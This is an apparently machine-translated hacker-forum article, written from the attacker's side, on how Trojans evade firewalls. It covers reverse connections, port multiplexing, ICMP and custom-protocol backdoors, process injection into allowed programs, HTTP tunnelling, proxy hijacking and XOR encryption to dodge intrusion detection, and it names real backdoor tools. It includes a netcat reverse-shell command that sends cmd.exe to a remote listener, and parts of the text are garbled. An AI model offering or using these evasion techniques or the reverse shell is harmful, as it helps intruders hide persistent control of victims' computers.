Principle of Trojan wall-mounting

Principle of Trojan wall-mounting

If the network is not too stable, people will set up firewall to defend against network attacks. Isn't this a huge challenge for the survival of our Trojans?

Competing for things, survival of the fittest, well... to survive, we have to go through the wall! Bypass Firewall:

1. First, No Firewall (allows local external listening to basically any port), No Firewall? (Isn't that nonsense ?)

It is easy to deal with such a machine. Generally, any horse can be used as a typical representative of Radmin (in fact, it is not a horse. If it is used more people, it will become a horse. It is innocent)

Rdp 3389/tcp (Remote Desktop, it is not a horse, but you don't need it. Who else can use it ?)

2. port filtering (only allow external connections to specific ports, that is, external requests to initiate syn connections to specific ports are accepted to complete three handshakes and establish connections. Otherwise, the firewall discards data packets, A handshake cannot be completed, and a connection cannot be established. That is, a Trojan cannot open a port and listen to the connection)

A high foot, a high foot .:

If you don't want me to connect to you, I will let you connect to me. The bounce port technology is born (generally, the firewall will not block locally initiated syn connection requests)

Use the tool netcat (: http://www.heibai.net/download/Soft/Soft_5972.htm) to puncture this firewall:

Nc-e cmd.exe remote ip remote listening port

Subsequently, port multiplexing technology emerged, reusing open ports of the firewall, such as 80, 21, and 445.

Typical backdoors such as hkdoor and ntrookit (The author is yyt_hac)

There is also the use of the port-free protocol for communications, such as the use of icmp packets, (Ping is the use of the ICMP protocol Echo Request and Echo Reply to detect the host survival)

Typical Example: pingdoor (because icmp packets are used for Ping, port filtering is helpless because ports are not opened at all, but icmp does not have error control, so the transmission characteristics of such backdoors are not ideal, unless you add error control)

What's more, simply put aside the TCP/IP protocol and the trojan custom protocol for communication. What can your firewall do with me? Haha

For example, ntrootkit adopts the custom protocol technology.

3. Application filtering (only allow specific programs to access the network)

Trojan horses cannot lag behind, so they cannot access the network, so they have to send a message:

The process plug-in technology is born. Generally, firewallcan allow iexplore.exe,e.e.exe,svchost.exe,services.exe and other programs to access the network. As a result, the trojan is eyeing these programs. Insert... insert and then insert.

In progress) and the gray pigeon/pc (embedded in the iexplorer.exe browser process.

4. protocol filtering.

(For example, only port 80 is allowed to pass the http protocol, so that the Backdoors that use port multiplexing do not use the http protocol, and are unfortunately rejected by the firewall .:-)

What should I do? Underwrite Chen Cang and dig tunnel: http-tunnel encapsulates Trojan communication into http datagram for transmission.

Pcshare is used (two-way http tunnel transmission is used)

 

5. IP address filtering is generally divided into three layers: Local Computer, lan, and Wan. However, Trojans are not vegetarian, and some Trojans have begun to become intelligent:

 

For example, if you cannot connect to a hacker host or stepping stone, search for the proxy settings of the Local Machine, such as IE proxy settings, and then go out as the proxy!

It can be imagined that P2P Trojans will soon become possible, so that the difference between Trojans and botnets will be even smaller.

6. nowadays, many firewalls can detect transmitted sensitive information, such as user passwords. Therefore, anti-IDS and automatic analysis become things that need to be considered by advanced Trojans, in other words, it protects the security and privacy of hacker control. A typical solution is to adopt encryption measures, such as the simplest method to deal with IDS detection, xor exclusive or encryption.

However, the current protective wall is certainly not the separation of the above technologies, but must be used by a number of technologies at the same time.

At the same time, it is not uncommon for Trojans to comprehensively utilize the above confrontation technologies.